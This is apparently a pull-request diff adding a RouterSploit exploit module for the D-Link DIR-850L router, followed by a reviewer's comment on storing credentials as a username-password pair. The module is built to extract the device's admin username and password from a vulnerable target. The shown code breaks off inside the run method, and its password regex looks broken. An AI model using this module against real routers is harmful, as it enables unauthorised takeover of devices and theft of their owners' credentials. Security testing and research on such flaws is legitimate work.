routersploit/modules/exploits/routers/dlink/dir_850_admin_creds_disclosure.py

```diff
@@ -0,0 +1,67 @@
+import re
+from random import randint
+
+from routersploit import (
+    exploits,
+    mute,
+    validators,
+    http_request,
+    print_table,
+    print_success,
+    print_error,
+)
+
+
+class Exploit(exploits.Exploit):
+    """ Exploit template. """
+    __info__ = {
+        'name': 'D-Link DIR-850L Credential Disclosure',
+        'authors': [
+            'Hack2Win',  # vulnerability discovery
+            'GH0st3rs',  # routersploit module
+        ],
+        'description': 'D-Link DIR-850L remote code execution variant exploit that extracts username and password for the device.',
+        'references': [
+            'https://packetstormsecurity.com/files/145097/dlink-850-admin-creds-retriever.sh.txt',
+            'https://www.rapid7.com/db/modules/exploit/linux/http/dlink_dir850l_unauth_exec',
+            'https://blogs.securiteam.com/index.php/archives/3364'
+        ],
+        'devices': [
+            'D-Link DIR-850L',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
+    port = exploits.Option(80, 'Target Port')
+    request_body = ''
+
+    def run(self):
+        if self.check():
+            print_success("Target appears to be vulnerable")
+            creds = []
+            username = re.findall('<name>(.*)</name>', self.request_body)
+            if username:
+                creds.append(username[0])
+            password = re.findall('<password></password>', self.request_body)
+            if password:
+                creds.append(password[0])
```

Comment:
The entire section above should be in a way that single record of creds is [username, password]
```python
creds.append((username[0], password[0]))
```